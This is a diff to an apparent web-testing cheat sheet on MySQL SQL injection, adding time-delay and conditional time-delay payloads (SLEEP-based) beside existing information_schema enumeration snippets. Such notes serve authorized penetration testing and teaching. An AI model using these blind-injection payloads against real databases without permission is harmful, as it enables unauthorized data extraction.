--- a/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.2.Testing_for_MySQL.md
+++ b/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.2.Testing_for_MySQL.md
@@ -75,6 +75,18 @@ SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME'
 SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')
 ```
 
+# Time delays
+
+```sql
+SELECT SLEEP(10)
+```
+
+# Conditional time delays
+
+```sql
+SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')
+```
+
 # Substring
 
 ```sql
